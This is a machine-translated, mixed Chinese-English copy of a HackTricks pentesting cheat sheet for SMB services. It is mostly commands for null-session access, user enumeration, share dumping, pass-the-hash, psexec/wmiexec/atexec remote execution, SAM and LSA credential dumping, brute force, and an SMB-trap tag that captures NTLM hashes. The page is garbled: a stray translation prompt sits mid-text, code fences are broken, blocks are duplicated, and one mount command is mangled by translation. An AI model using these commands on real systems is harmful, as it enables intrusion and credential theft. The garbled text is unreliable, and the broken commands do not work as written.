# 139,445 - SMB 渗透测试
☁️ HackTricks 云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 * 你在一家**网络安全公司**工作吗?想要在 HackTricks 中**宣传你的公司**吗?或者你想要**获取最新版本的 PEASS 或下载 HackTricks 的 PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family) * 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com) * **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * **通过向[hacktricks 仓库](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud 仓库](https://github.com/carlospolop/hacktricks-cloud)提交 PR 来分享你的黑客技巧**。
## **端口 139** **NetBIOS** 代表 _网络基本输入输出系统_。它是一种软件协议,允许局域网(LAN)上的应用程序、个人电脑和桌面电脑与网络硬件进行通信,并在网络上传输数据。在 NetBIOS 网络上运行的软件应用程序通过它们的 NetBIOS 名称定位和识别彼此。NetBIOS 名称最长可达 16 个字符,并且通常与计算机名称分开。当一个应用程序(客户端)通过 **TCP 端口 139** 发送命令“呼叫”另一个客户端(服务器)时,它们会启动一个 NetBIOS 会话。(摘自[这里](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for)) ``` 139/tcp open netbios-ssn Microsoft Windows netbios-ssn ``` ## 端口445 虽然端口139在技术上被称为“NBT over IP”,但端口445是“SMB over IP”。**SMB**代表“**Server Message Blocks**”。现代语言中,Server Message Block也被称为**Common Internet File System**。该系统作为应用层网络协议主要用于在网络上的节点之间提供共享文件、打印机、串口和其他通信方式。 例如,在Windows上,SMB可以直接在TCP/IP上运行,而无需NetBIOS over TCP/IP。正如你所指出的,这将使用端口445。在其他系统上,你会发现服务和应用程序使用端口139。这意味着SMB正在使用NetBIOS over TCP/IP。(摘自[这里](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for)) ``` 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) ``` ### SMB Server Message Block (`SMB`) 是一种**客户端-服务器**协议,用于管理对文件、整个目录和其他网络资源(如打印机、路由器或网络接口)的访问。该协议的主要应用领域是特定的**Windows**操作系统系列,其网络服务以向下兼容的方式支持SMB - 这意味着具有较新版本的设备可以轻松与安装有较旧Microsoft操作系统的设备进行通信。\ 通过免费软件项目**Samba**,还可以在Linux和Unix发行版中使用**SMB**,从而实现跨平台的SMB通信。 SMB服务器可以将其本地文件系统的**任意部分作为共享**提供。因此,对客户端可见的**层次结构**部分上**独立于服务器上的结构**。**访问权限**由`访问控制列表`(`ACL`)定义。它们可以根据**`执行`**、**`读取`**和**`完全访问`**等属性以**细粒度的方式**对个别用户或用户组进行控制。**ACL**是基于共享定义的,因此与在服务器上本地分配的权限不对应。 ### IPC$ 共享 来自书籍 _**Network Security Assessment 3rd edition**_ 通过匿名空会话,您可以访问IPC$共享并与通过命名管道公开的服务进行交互。Kali Linux中的enum4linux实用程序非常有用;使用它,您可以获取以下信息: * 操作系统信息 * 父域的详细信息 * 本地用户和组列表 * 可用SMB共享的详细信息 * 有效的系统安全策略 ## 什么是NTLM 如果您不知道什么是NTLM,或者想了解它是如何工作和如何滥用它的,您会发现这个关于**NTLM**的页面非常有趣,其中解释了**该协议的工作原理以及您如何利用它:** {% content-ref url="../windows-hardening/ntlm/" %} [ntlm](../windows-hardening/ntlm/) {% endcontent-ref %} ## **服务器枚举** ### **扫描**网络以搜索主机: ```bash nbtscan -r 192.168.0.1/24 ``` ### SMB 服务器版本 为了寻找可能的 SMB 版本漏洞,了解正在使用的版本非常重要。如果这些信息在其他工具中没有显示,你可以: * 使用 **MSF** 辅助模块 \_**auxiliary/scanner/smb/smb\_version** * 或者使用以下脚本: ```bash #!/bin/sh #Author: rewardone #Description: # Requires root or enough permissions to use tcpdump # Will listen for the first 7 packets of a null login # and grab the SMB Version #Notes: # Will sometimes not capture or will print multiple # lines. May need to run a second time for success. if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi if [ ! -z $2 ]; then rport=$2; else rport=139; fi tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " & echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null echo "" && sleep .1 ``` ### **搜索漏洞** To search for exploits, you can use various tools and resources. Here are some common methods: - **Exploit Databases**: Websites like Exploit-DB, Rapid7, and Metasploit provide extensive databases of known exploits. You can search these databases using relevant keywords or specific vulnerabilities. - **Vulnerability Scanners**: Tools like Nessus, OpenVAS, and Nexpose can scan networks and systems for known vulnerabilities and provide a list of potential exploits. - **Security Bulletins**: Software vendors and security organizations often release security bulletins that detail vulnerabilities and their associated exploits. These bulletins can be found on the vendor's website or through security advisory services. - **Exploit Frameworks**: Frameworks like Metasploit offer a wide range of exploits and payloads that can be used for penetration testing. These frameworks provide a command-line interface for searching and executing exploits. Remember to always use these tools and resources responsibly and with proper authorization. Unauthorized exploitation of vulnerabilities is illegal and unethical. ```bash msf> search type:exploit platform:windows target:2008 smb searchsploit microsoft smb ``` ### **可能的**凭据 | **用户名** | **常见密码** | | -------------------- | ----------------------------------------- | | _(空白)_ | _(空白)_ | | guest | _(空白)_ | | Administrator, admin | _(空白)_, password, administrator, admin | | arcserve | arcserve, backup | | tivoli, tmersrvd | tivoli, tmersrvd, admin | | backupexec, backup | backupexec, backup, arcada | | test, lab, demo | password, test, lab, demo | ### SMB环境信息 ### 获取信息 ```bash #Dump interesting information enum4linux -a [-u "" -p ""] enum4linux-ng -A [-u "" -p ""] nmap --script "safe or smb-enum-*" -p 445 #Connect to the rpc rpcclient -U "" -N #No creds rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb --pw-nt-hash rpcclient -U "username%passwd" #With creds #You can use querydispinfo and enumdomusers to query user information #Dump user information /usr/share/doc/python3-impacket/examples/samrdump.py -port 139 [[domain/]username[:password]@] /usr/share/doc/python3-impacket/examples/samrdump.py -port 445 [[domain/]username[:password]@] #Map possible RPC endpoints /usr/share/doc/python3-impacket/examples/rpcdump.py -port 135 [[domain/]username[:password]@] /usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@] /usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@] ``` ### 枚举用户、组和已登录用户 # 这些信息应该已经从enum4linux和enum4linux-ng中收集到了 ```bash crackmapexec smb 10.10.10.10 --users [-u -p ] crackmapexec smb 10.10.10.10 --groups [-u -p ] crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u -p ] ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " " rpcclient -U "" -N 10.10.10.10 enumdomusers enumdomgroups ``` ### 枚举本地用户 [Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py) ```bash lookupsid.py -no-pass hostname.local ``` 以下是关于黑客技术的一本书中的内容。以下内容来自文件network-services-pentesting/pentesting-smb.md。将相关的英文文本翻译成中文,并返回翻译结果,保持完全相同的markdown和html语法。请不要翻译代码、黑客技术名称、黑客术语、云/SaaS平台名称(如Workspace、aws、gcp...)、泄漏一词、渗透测试和markdown标签。此外,请不要添加任何额外的内容,只需提供翻译和markdown语法即可。 ```bash for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done ``` ### Metasploit - 枚举本地用户 ```bash use auxiliary/scanner/smb/smb_lookupsid set rhosts 主机名.local run ``` ### **Enumerating LSARPC and SAMR rpcclient** {% content-ref url="pentesting-smb/rpcclient-enumeration.md" %} [rpcclient-enumeration.md](pentesting-smb/rpcclient-enumeration.md) {% endcontent-ref %} ### GUI connection from linux #### In the terminal: `xdg-open smb://cascade.htb/` #### In file browser window (nautilus, thunar, etc) `smb://friendzone.htb/general/` ## Shared Folders Enumeration ### List shared folders It is always recommended to look if you can access to anything, if you don't have credentials try using **null** **credentials/guest user**. ```bash ```markdown ## smbclient --no-pass -L // # 空用户 smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // # 如果省略密码,将提示输入。使用 --pw-nt-hash,提供的密码是NT哈希值 ## smbmap -H [-P ] # 空用户 smbmap -u "username" -p "password" -H [-P ] # 凭证 smbmap -u "username" -p ":" -H [-P ] # Pass-the-Hash smbmap -R -u "username" -p "password" -H [-P ] # 递归列表 ## crackmapexec smb -u '' -p '' --shares # 空用户 crackmapexec smb -u 'username' -p 'password' --shares # Guest用户 crackmapexec smb -u 'username' -H '' --shares # Guest用户 ``` ``` ### **Connect/List a shared folder** ```bash # 使用smbclient进行连接 smbclient --no-pass /// smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // #如果省略密码,将会提示输入。使用--pw-nt-hash,提供的密码是NT哈希值 # 使用--no-pass -c 'recurse;ls' 以smbclient递归列出文件列表 # 使用smbmap进行列出,不指定文件夹将列出所有内容 smbmap [-u "username" -p "password"] -R [Folder] -H [-P ] # 递归列出 smbmap [-u "username" -p "password"] -r [Folder] -H [-P ] # 非递归列出 smbmap -u "username" -p ":" [-r/-R] [Folder] -H [-P ] # 使用哈希传递密码 ``` ### **Manually enumerate windows shares and connect to them** It may be possible that you are restricted to display any shares of the host machine and when you try to list them it appears as if there aren't any shares to connect to. Thus it might be worth a short to try to manually connect to a share. To enumerate the shares manually you might want to look for responses like NT\_STATUS\_ACCESS\_DENIED and NT\_STATUS\_BAD\_NETWORK\_NAME, when using a valid session (e.g. null session or valid credentials). These may indicate whether the share exists and you do not have access to it or the share does not exist at all. Common share names for windows targets are * C$ * D$ * ADMIN$ * IPC$ * PRINT$ * FAX$ * SYSVOL * NETLOGON (Common share names from _**Network Security Assessment 3rd edition**_) You can try to connect to them by using the following command ```bash ```markdown 使用空会话连接到Windows共享: ``` ```bash smbclient -U '%' -N \\\\\\ ``` ```markdown 使用身份验证会话连接到Windows共享(将提示输入密码): ``` ```bash smbclient -U '' \\\\\\ ``` ``` or this script (using a null session) ```bash #/bin/bash ip='' shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON') for share in ${shares[*]}; do output=$(smbclient -U '%' -N \\\\$ip\\$share -c '') if [[ -z $output ]]; then echo "[+] 可以创建一个空会话来访问 $share" # 如果命令成功执行,没有输出,因此假设已创建会话 else echo $output # 输出错误信息(例如 NT_STATUS_ACCESS_DENIED 或 NT_STATUS_BAD_NETWORK_NAME) fi done ``` examples ```bash ```markdown ## SMB服务渗透 ### smbclient命令 使用`smbclient`命令可以与SMB服务进行交互。以下是一些常用的`smbclient`命令示例: - `smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here`:返回`NT_STATUS_BAD_NETWORK_NAME`错误。 - `smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$`:返回`NT_STATUS_ACCESS_DENIED`错误,或者甚至会给你一个会话。 ``` ```html

SMB服务渗透

smbclient命令

使用smbclient命令可以与SMB服务进行交互。以下是一些常用的smbclient命令示例:

  • smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here:返回NT_STATUS_BAD_NETWORK_NAME错误。
  • smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$:返回NT_STATUS_ACCESS_DENIED错误,或者甚至会给你一个会话。
``` ``` ### Mount a shared folder ```bash ```shell 挂载 -t cifs //x.x.x.x/share /mnt/share 挂载 -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share ``` ``` ### **Download files** Read previous sections to learn how to connect with credentials/Pass-the-Hash. ```bash #搜索并下载文件 sudo smbmap -R 文件夹 -H -A <文件名> -q # 以递归模式搜索文件并将其下载到 /usr/share/smbmap 中 ``` ```bash # 下载全部文件 smbclient ///<共享目录> > mask "" > recurse > prompt > mget * # 将所有文件下载到当前目录 ``` Commands: * mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files) * recurse: toggles recursion on (default: off) * prompt: toggles prompting for filenames off (default: on) * mget: copies all files matching the mask from host to client machine (_Information from the manpage of smbclient_) ### Domain Shared Folders Search * [**Snaffler**](https://github.com/SnaffCon/Snaffler)**** ```bash ``` Snaffler.exe -s -d domain.local -o snaffler.log -v data ``` 使用Snaffler.exe工具,执行以下命令: ``` Snaffler.exe -s -d domain.local -o snaffler.log -v data ``` - `-s` 参数表示启用扫描模式。 - `-d domain.local` 参数指定要扫描的目标域名。 - `-o snaffler.log` 参数将扫描结果输出到名为snaffler.log的日志文件中。 - `-v data` 参数表示详细输出扫描结果的数据信息。 ``` * [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider. * `-M spider_plus [--share ]` * `--pattern txt` ```bash ``` sudo crackmapexec smb 10.10.10.10 -u 用户名 -p 密码 -M spider_plus --share '部门共享' ``` ``` Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials. {% hint style="info" %} The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\ You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**. {% endhint %} ## Read Registry You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try: ```bash ``` sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s ``` ``` sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s ``` ``` ## Post Exploitation The **default config of** a **Samba** server is usually located in `/etc/samba/smb.conf` and might have some **dangerous configs**: | **Setting** | **Description** | | --------------------------- | ------------------------------------------------------------------- | | `browseable = yes` | Allow listing available shares in the current share? | | `read only = no` | Forbid the creation and modification of files? | | `writable = yes` | Allow users to create and modify files? | | `guest ok = yes` | Allow connecting to the service without using a password? | | `enable privileges = yes` | Honor privileges assigned to specific SID? | | `create mask = 0777` | What permissions must be assigned to the newly created files? | | `directory mask = 0777` | What permissions must be assigned to the newly created directories? | | `logon script = script.sh` | What script needs to be executed on the user's login? | | `magic script = script.sh` | Which script should be executed when the script gets closed? | | `magic output = script.out` | Where the output of the magic script needs to be stored? | The command `smbstatus` gives information about the **server** and about **who is connected**. ## Authenticate using Kerberos You can **authenticate** to **kerberos** using the tools **smbclient** and **rpcclient**: ```bash ```markdown ## SMB (Server Message Block) 渗透测试 ### smbclient --kerberos //ws01win10.domain.com/C$ 使用 `smbclient` 命令与 SMB 服务器建立连接,并使用 Kerberos 身份验证。连接的目标是 `ws01win10.domain.com` 主机上的共享文件夹 `C$`。 ### rpcclient -k ws01win10.domain.com 使用 `rpcclient` 命令与 SMB 服务器建立连接,并使用 Kerberos 身份验证。连接的目标是 `ws01win10.domain.com` 主机。 ``` ```html

SMB (Server Message Block) 渗透测试

smbclient --kerberos //ws01win10.domain.com/C$

使用 smbclient 命令与 SMB 服务器建立连接,并使用 Kerberos 身份验证。连接的目标是 ws01win10.domain.com 主机上的共享文件夹 C$

rpcclient -k ws01win10.domain.com

使用 rpcclient 命令与 SMB 服务器建立连接,并使用 Kerberos 身份验证。连接的目标是 ws01win10.domain.com 主机。

``` ``` ## **Execute Commands** ### **crackmapexec** crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec** being **wmiexec** the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`: ```bash ```markdown 安装crackmapexec: ``` ```shell apt-get install crackmapexec ``` ```markdown 执行Powershell命令: ``` ```shell crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' ``` ```markdown 执行cmd命令: ``` ```shell crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami ``` ```markdown 使用Pass-the-Hash技术: ``` ```shell crackmapexec smb 192.168.10.11 -u Administrator -H -x whoami ``` ```markdown 使用不同的执行方法: ``` ```shell crackmapexec smb -d -u Administrator -p 'password' --exec-method {mmcexec,smbexec,atexec,wmiexec} ``` ```markdown 获取SAM信息: ``` ```shell crackmapexec smb -d -u Administrator -p 'password' --sam ``` ```markdown 获取LSASS内存哈希: ``` ```shell crackmapexec smb -d -u Administrator -p 'password' --lsa ``` ```markdown 获取会话信息: ``` ```shell crackmapexec smb -d -u Administrator -p 'password' --sessions ``` ```markdown 获取已登录用户: ``` ```shell crackmapexec smb -d -u Administrator -p 'password' --loggedon-users ``` ```markdown 枚举磁盘: ``` ```shell crackmapexec smb -d -u Administrator -p 'password' --disks ``` ```markdown 枚举用户: ``` ```shell crackmapexec smb -d -u Administrator -p 'password' --users ``` ```markdown 枚举组: ``` ```shell crackmapexec smb -d -u Administrator -p 'password' --groups ``` ```markdown 枚举本地组: ``` ```shell crackmapexec smb -d -u Administrator -p 'password' --local-groups ``` ```markdown 获取密码策略: ``` ```shell crackmapexec smb -d -u Administrator -p 'password' --pass-pol ``` ```markdown 使用RID暴力破解: ``` ```shell crackmapexec smb -d -u Administrator -p 'password' --rid-brute ``` ```markdown 使用Pass-The-Hash技术: ``` ```shell crackmapexec smb -d -u Administrator -H ``` ``` ### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md) Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\ **More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\ In **kali** it is located on /usr/share/doc/python3-impacket/examples/ ```bash #如果没有提供密码,将会提示输入 ./psexec.py [[domain/]username[:password]@] ./psexec.py -hashes administrator@10.10.10.103 #Pass-the-Hash psexec \\192.168.122.66 -u Administrator -p 123456Ww psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # 使用Pass-the-Hash ``` Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM** ### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\ In **kali** it is located on /usr/share/doc/python3-impacket/examples/ ```bash #如果没有提供密码,将会提示输入密码 ./wmiexec.py [[domain/]username[:password]@] #提示输入密码 ./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #传递哈希 #您可以在命令的末尾添加要执行的CMD命令,如果不这样做,将提示一个半交互式shell ``` Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM** ```bash #如果没有提供密码,将会提示输入密码 ./dcomexec.py [[domain/]username[:password]@] ./dcomexec.py -hashes administrator@10.10.10.103 #Pass-the-Hash #您可以在命令的末尾添加要执行的CMD命令,如果不这样做,将提示一个半交互式shell ``` ### [AtExec](../windows-hardening/ntlm/atexec.md) Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\ In **kali** it is located on /usr/share/doc/python3-impacket/examples/ ```bash ``` ./atexec.py [[domain/]username[:password]@] "command" ./atexec.py -hashes administrator@10.10.10.175 "whoami" ``` ``` ./atexec.py [[域/]用户名[:密码]@]<目标名称或地址> "命令" ./atexec.py -hashes administrator@10.10.10.175 "whoami" ``` ``` ## Impacket reference [https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/) ## **Bruteforce users credentials** **This is not recommended, you could block an account if you exceed the maximum allowed tries** ```bash ```shell nmap --script smb-brute -p 445 ridenum.py 500 50000 /root/passwds.txt #使用ridenum.py脚本对rid进行暴力破解,然后尝试对每个用户名进行暴力破解 ``` ``` ## SMB relay attack This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.\ [**More information about this attack here.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md) ## SMB-Trap The Windows library URLMon.dll automatically try to authenticaticate to the host when a page tries to access some contect via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"` This happens with the functions: * URLDownloadToFile * URLDownloadToCache * URLOpenStream * URLOpenBlockingStream Which are used by some browsers and tools (like Skype) ![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>) ### SMBTrap using MitMf ![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (94).png>) ## NTLM Theft Similar to SMB Trapping, planting malicious files onto a target system (via SMB, for example) can illicit an SMB authentication attempt, allowing the NetNTLMv2 hash to be intercepted with a tool such as Responder. The hash can then be cracked offline or used in an [SMB relay attack](pentesting-smb.md#smb-relay-attack). [See: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft) ## HackTricks Automatic Commands ``` 协议名称:SMB 端口号:137、138、139 协议描述:服务器消息块 条目1: 名称:笔记 描述:SMB的笔记 注意:| 虽然端口139在技术上被称为“NBT over IP”,端口445是“SMB over IP”。SMB代表“服务器消息块”。现代语言中,服务器消息块也被称为常见的Internet文件系统。该系统作为应用层网络协议主要用于在网络上的节点之间提供共享访问文件、打印机、串口和其他通信方式。 #每当我看到一个开放的SMB端口时,我按照以下顺序运行这些命令 无凭证 nbtscan {IP} smbmap -H {IP} smbmap -H {IP} -u null -p null smbmap -H {IP} -u guest smbclient -N -L //{IP} smbclient -N //{IP}/ --option="client min protocol"=LANMAN1 rpcclient {IP} rpcclient -U "" {IP} crackmapexec smb {IP} crackmapexec smb {IP} --pass-pol -u "" -p "" crackmapexec smb {IP} --pass-pol -u "guest" -p "" GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/" getArch.py -target {IP} 有凭证 smbmap -H {IP} -u {Username} -p {Password} smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash` crackmapexec smb {IP} -u {Username} -p {Password} --shares GetADUsers.py {Domain_Name}/{Username}:{Password} -all GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request https://book.hacktricks.xyz/pentesting/pentesting-smb 条目2: 名称:Enum4Linux 描述:常规SMB扫描 命令:enum4linux -a {IP} 条目3: 名称:Nmap SMB扫描1 描述:使用Nmap进行SMB漏洞扫描 命令:nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP} 条目4: 名称:Nmap SMB扫描2 描述:使用Nmap进行SMB漏洞扫描(不太具体) 命令:nmap --script smb-vuln* -Pn -p 139,445 {IP} 条目5: 名称:Hydra暴力破解 描述:需要用户名 命令:hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb 条目6: 名称:SMB/SMB2 139/445无需运行msfconsole的mfs枚举 描述:SMB/SMB2 139/445枚举,无需运行msfconsole 注意:来源于https://github.com/carlospolop/legion 命令:msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit' ```
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.